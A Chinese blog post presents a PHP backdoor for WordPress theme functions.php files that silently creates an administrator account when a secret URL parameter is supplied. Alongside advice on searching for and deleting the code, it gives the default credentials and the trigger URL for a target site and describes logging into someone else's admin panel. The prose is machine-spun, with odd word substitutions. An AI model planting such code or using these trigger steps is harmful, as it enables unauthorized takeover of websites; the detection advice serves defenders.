互创青年

WordPress主题后门代码

大家都知道安装好wordpress之后,我们总是去网上找一些免费的wordpress主题来用,并没有想到这里面还有很多玄机,一不小心就会被人植入的后门。接下来给大家介绍一个一段后门代码。

免费的wordpress主题是不是都安全呢?我想很少有人去考虑到这个疑问,至少最初我用主题的时候都没有想到,wordpress主题居然还有后门!我也是今日看到了这个代码才发现。

  1. add_action( ‘wp_head’, ‘my_backdoor’ );
  2. function my_backdoor() {
  3. if ( md5( $_GET[‘backdoor’] ) == ‘324a37da6577a6319378e23870852fee’ ) {
  4. require( ‘wp-includes/registration.php’ );
  5. if ( !username_exists( ‘mr_admin’ ) ) {
  6. $user_id = wp_create_user( ‘nanguo520’, ‘com’ );
  7. $user = new WP_User( $user_id );
  8. $user->set_role( ‘administrator’ );
  9. }
  10. }
  11. }

这段代码存在于functions.php文件中,想要查询你的wordpress主题是不是也存在这么一个后门,你只需要翻开wordpress后台——外观——批改,然后找到functions.php模板函数文件翻开它,毕竟运用Ctrl+F组合键,将上面代码中的某一句输入查找,看functions.php文件中有没有这个代码就行了,如果有,赶快删去,不然,你懂的!

这个代码正本就是给wordpree创建一个管理员帐号,我这儿默认设置的账号暗码分别是nanguo520和com

运用方法:翻开http://方针.com/?backdoor=nanguo520(如果在二级目录就加个二级)

然后,你就可以运用你的暗码来登入他的后台了,正常登入即可,并且是管理员权限噢~

好了,同享是一种美德,千万不要拿去做坏事哦!

赞 (0)
上一篇:     下一篇:
码字很辛苦,转载请注明来自互创设计《WordPress主题后门代码》

评论